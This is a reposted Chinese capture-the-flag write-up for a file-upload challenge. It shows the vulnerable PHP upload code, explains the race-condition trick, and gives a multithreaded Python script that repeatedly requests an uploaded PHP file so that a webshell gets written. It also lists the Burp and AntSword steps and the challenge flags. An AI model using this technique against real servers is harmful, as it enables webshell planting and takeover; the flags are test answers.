码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 攻防世界-web-wzsc_文件上传


    打开环境,很简单的上传界面 

    上传一个空内容的jpg文件,上传成功 

     

    网站代码如下 

    1. $allowtype = array("txt","jpeg","bmv","doc","docx","gif","png","jpg");
    2. $size = 10000000;
    3. $path = "./upload/";
    4. $filename = $_FILES['file']['name'];
    5. if (is_uploaded_file($_FILES['file']['tmp_name'])){
    6. if (!move_uploaded_file($_FILES['file']['tmp_name'],$path.$filename)){
    7. exit();
    8. }
    9. } else {
    10. exit();
    11. }
    12. $newfile = $path.$filename;
    13. if ($_FILES['file']['error'] > 0){
    14. unlink($newfile);
    15. exit();
    16. }
    17. $ext = array_pop(explode(".",$_FILES['file']['name']));
    18. if (!in_array($ext,$allowtype)){
    19. unlink($newfile);
    20. exit();
    21. }
    22. ?>

     来源于下面的文章

    https://blog.csdn.net/qq_45608153/article/details/126312379

    利用条件竞争文件上传

    1. 文件上传过程介绍
    文件上传过程:
    服务器获取文件>>>保存上传临时文件>>>重命名移动临时文件
    2. 竞争条件原理介绍
    网站逻辑:
    1、网站允许上传任意文件,然后检查上传文件是否包含Webshell,如果包含删除该文件。

    2、网站允许上传任意文件,但是如果不是指定类型,那么使用unlink删除文件。

    在删除之前访问上传的php文件,从而执行上传文件中的php代码。
    例如:上传文件代码如下

    1. ');
    2. ?>

    本题所需代码如下 

    此为需要上传的文件内容

    '); ?>

    此为脚本代码

    1. import requests
    2. import threading
    3. import os
    4. class RaceCondition(threading.Thread):
    5. def __init__(self):
    6. threading.Thread.__init__(self)
    7. self.url = 'http://61.147.171.105:51444/upload/a.php'
    8. self.uploadUrl = 'http://61.147.171.105:51444/upload/shell.php'
    9. def _get(self):
    10. print('try to call uploaded file...')
    11. r = requests.get(self.url)
    12. if r.status_code == 200:
    13. print('[*] create file shell.php success.')
    14. os._exit(0)
    15. def _upload(self):
    16. print('upload file...')
    17. rs = requests.get(self.uploadUrl)
    18. if rs.status_code == 200:
    19. print('[*] create file shell.php success.')
    20. os._exit(0)
    21. def run(self):
    22. while True:
    23. for i in range(5):
    24. self._get()
    25. for i in range(10):
    26. self._upload()
    27. self._get()
    28. if __name__ == '__main__':
    29. threads = 50
    30. for i in range(threads):
    31. t = RaceCondition()
    32. t.start()
    33. for i in range(threads):
    34. t.join()

    先利用bp一直post那个文件

    再跑脚本 

    可以看到shell已经被上传,用蚁剑连接 

    flag{123qwesadqweuoiwqjdsaiqnoi} (假的,把我骗到了,按他后面的路径走)

     cyberpeace{8c4eaae8653fa86a7693a6dd7d5f3244}

  • 相关阅读:
    JdbcTemplate查询操作
    Linux权限
    h5日历组件制作
    隆云通空气温湿、大气压力、CO2四参数传感器
    记录 K8S 挂了的解决经过
    【微信小程序】6天精准入门(第3天:小程序flex布局、轮播图组件及mock运用以及综合案例)附源码
    视频汇聚平台EasyCVR对接GA/T 1400视图库:结构化数据(人员/人脸、车辆、物品)对象XMLSchema描述
    只需根据接口文档,就能轻松开发 get 和 post 请求的脚本,你会做吗?
    HDFS 联邦
    AIGC ChatGPT 4 与 Python 进行数据分析与可视化
  • 原文地址:https://blog.csdn.net/qq_29977871/article/details/126499845
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号